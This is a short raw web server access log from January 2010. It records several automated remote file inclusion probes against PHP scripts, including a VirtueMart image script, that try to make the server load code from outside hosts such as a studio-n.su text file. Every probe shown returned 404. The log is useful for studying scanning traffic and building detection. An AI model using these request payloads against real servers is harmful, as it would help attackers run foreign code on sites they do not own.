94.124.120.47 - - [05/Jan/2010:00:18:13 -0500] "GET /logs/access_log.Q109102100%20%20//include/admin.lib.inc.php?site_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:00:18:31 -0500] "GET /logs/access_log.Q109102100%20%20//include/admin.lib.inc.php?site_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:00:18:43 -0500] "GET /logs/access_log.Q109102100%20%20//include/admin.lib.inc.php?site_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:00:19:49 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:00:19:49 -0500] "GET /logs/access_log.Q109080800///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:00:19:49 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:00:19:49 -0500] "GET /logs/access_log.Q109051600///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.122.157.111 - - [05/Jan/2010:00:20:00 -0500] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.studio-n.su/tmp/index1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
